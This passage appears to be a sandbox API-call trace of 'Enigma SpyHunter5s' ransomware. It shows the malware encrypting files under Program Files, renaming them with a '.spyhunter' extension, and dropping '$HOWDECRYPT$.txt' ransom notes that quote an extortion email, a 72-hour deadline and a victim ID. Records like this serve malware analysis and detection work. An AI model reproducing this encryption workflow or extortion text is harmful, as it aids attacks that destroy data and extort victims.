lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e6b4*=0x2800, lpOverlapped=0x0) returned 1 [0164.475] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.475] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e6b4*=0x2800, lpOverlapped=0x0) returned 1 [0164.475] GetProcessHeap () returned 0x2c0000 [0164.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.475] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.475] WriteFile (in: hFile=0x178, lpBuffer=0x248e6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248e6f4*, lpNumberOfBytesWritten=0x248e6b4*=0x4, lpOverlapped=0x0) returned 1 [0164.477] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6b4*=0x30, lpOverlapped=0x0) returned 1 [0164.477] CloseHandle (hObject=0x178) returned 1 [0164.560] GetProcessHeap () returned 0x2c0000 [0164.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.560] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.spyhunter") returned 98 [0164.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll.spyhunter")) returned 1 [0164.561] GetProcessHeap () returned 0x2c0000 [0164.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.561] GetProcessHeap () returned 0x2c0000 [0164.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0164.561] GetProcessHeap () returned 0x2c0000 [0164.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5ecc0 | out: hHeap=0x2c0000) returned 1 [0164.561] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6f0 | out: pbBuffer=0x248e6f0) returned 1 [0164.561] GetProcessHeap () returned 0x2c0000 [0164.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0164.561] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e6e8*=0x30) returned 1 [0164.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.579] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll") returned 79 [0164.579] StrStrW (lpFirst="VSTAClientPkg.dll", lpSrch=".txt") returned 0x0 [0164.579] GetProcessHeap () returned 0x2c0000 [0164.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0164.579] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e6ac*=0x2800, lpOverlapped=0x0) returned 1 [0164.619] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.619] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e6ac*=0x2800, lpOverlapped=0x0) returned 1 [0164.619] GetProcessHeap () returned 0x2c0000 [0164.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0164.619] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.619] WriteFile (in: hFile=0xb0, lpBuffer=0x248e6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6ac, lpOverlapped=0x0 | out: lpBuffer=0x248e6ec*, lpNumberOfBytesWritten=0x248e6ac*=0x4, lpOverlapped=0x0) returned 1 [0164.678] WriteFile (in: hFile=0xb0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6ac*=0x30, lpOverlapped=0x0) returned 1 [0164.678] CloseHandle (hObject=0xb0) returned 1 [0164.680] GetProcessHeap () returned 0x2c0000 [0164.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.680] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.spyhunter") returned 89 [0164.680] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll.spyhunter")) returned 1 [0164.681] GetProcessHeap () returned 0x2c0000 [0164.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.681] GetProcessHeap () returned 0x2c0000 [0164.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0164.681] GetProcessHeap () returned 0x2c0000 [0164.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeaac8 | out: hHeap=0x2c0000) returned 1 [0164.682] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\sdk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.683] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.683] WriteFile (in: hFile=0x178, lpBuffer=0x248e623*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e74c, lpOverlapped=0x0 | out: lpBuffer=0x248e623*, lpNumberOfBytesWritten=0x248e74c*=0x127, lpOverlapped=0x0) returned 1 [0164.684] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.684] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e74c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e74c*=0x2ac, lpOverlapped=0x0) returned 1 [0164.684] CloseHandle (hObject=0x178) returned 1 [0164.684] GetProcessHeap () returned 0x2c0000 [0164.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5350 | out: hHeap=0x2c0000) returned 1 [0164.684] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.685] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.685] WriteFile (in: hFile=0x178, lpBuffer=0x248e61f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e748, lpOverlapped=0x0 | out: lpBuffer=0x248e61f*, lpNumberOfBytesWritten=0x248e748*=0x127, lpOverlapped=0x0) returned 1 [0164.686] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.686] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e748, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e748*=0x2ac, lpOverlapped=0x0) returned 1 [0164.686] CloseHandle (hObject=0x178) returned 1 [0164.686] GetProcessHeap () returned 0x2c0000 [0164.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea9e0 | out: hHeap=0x2c0000) returned 1 [0164.687] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.687] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.687] WriteFile (in: hFile=0x178, lpBuffer=0x248e61b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e744, lpOverlapped=0x0 | out: lpBuffer=0x248e61b*, lpNumberOfBytesWritten=0x248e744*=0x127, lpOverlapped=0x0) returned 1 [0164.688] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.688] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e744, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e744*=0x2ac, lpOverlapped=0x0) returned 1 [0164.689] CloseHandle (hObject=0x178) returned 1 [0164.689] GetProcessHeap () returned 0x2c0000 [0164.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecad60 | out: hHeap=0x2c0000) returned 1 [0164.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\packages\\debugger\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.689] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.690] WriteFile (in: hFile=0x178, lpBuffer=0x248e617*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e740, lpOverlapped=0x0 | out: lpBuffer=0x248e617*, lpNumberOfBytesWritten=0x248e740*=0x127, lpOverlapped=0x0) returned 1 [0164.690] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.691] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e740, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e740*=0x2ac, lpOverlapped=0x0) returned 1 [0164.691] CloseHandle (hObject=0x178) returned 1 [0164.691] GetProcessHeap () returned 0x2c0000 [0164.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9ed0 | out: hHeap=0x2c0000) returned 1 [0164.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.839] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.839] WriteFile (in: hFile=0xa0, lpBuffer=0x248e613*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e73c, lpOverlapped=0x0 | out: lpBuffer=0x248e613*, lpNumberOfBytesWritten=0x248e73c*=0x127, lpOverlapped=0x0) returned 1 [0164.840] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.840] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e73c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e73c*=0x2ac, lpOverlapped=0x0) returned 1 [0164.840] CloseHandle (hObject=0xa0) returned 1 [0164.840] GetProcessHeap () returned 0x2c0000 [0164.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecedd0 | out: hHeap=0x2c0000) returned 1 [0164.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6d8 | out: pbBuffer=0x248e6d8) returned 1 [0164.840] GetProcessHeap () returned 0x2c0000 [0164.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0164.841] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6d0*=0x30) returned 1 [0164.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.935] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip") returned 116 [0164.935] StrStrW (lpFirst="UserControl.zip", lpSrch=".txt") returned 0x0 [0164.935] GetProcessHeap () returned 0x2c0000 [0164.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0164.936] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e694*=0x5b1, lpOverlapped=0x0) returned 1 [0165.057] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.057] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x248e694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e694*=0x5b1, lpOverlapped=0x0) returned 1 [0165.057] GetProcessHeap () returned 0x2c0000 [0165.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.057] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.057] WriteFile (in: hFile=0x178, lpBuffer=0x248e6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e694, lpOverlapped=0x0 | out: lpBuffer=0x248e6d4*, lpNumberOfBytesWritten=0x248e694*=0x4, lpOverlapped=0x0) returned 1 [0165.057] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e694, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e694*=0x30, lpOverlapped=0x0) returned 1 [0165.058] CloseHandle (hObject=0x178) returned 1 [0165.058] GetProcessHeap () returned 0x2c0000 [0165.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0165.058] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip.spyhunter") returned 126 [0165.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip.spyhunter")) returned 1 [0165.059] GetProcessHeap () returned 0x2c0000 [0165.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.059] GetProcessHeap () returned 0x2c0000 [0165.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.059] GetProcessHeap () returned 0x2c0000 [0165.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88540 | out: hHeap=0x2c0000) returned 1 [0165.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6d8 | out: pbBuffer=0x248e6d8) returned 1 [0165.060] GetProcessHeap () returned 0x2c0000 [0165.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.060] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6d0*=0x30) returned 1 [0165.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.066] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip") returned 109 [0165.066] StrStrW (lpFirst="Form.zip", lpSrch=".txt") returned 0x0 [0165.066] GetProcessHeap () returned 0x2c0000 [0165.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.066] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e694*=0x514, lpOverlapped=0x0) returned 1 [0165.129] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffaec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 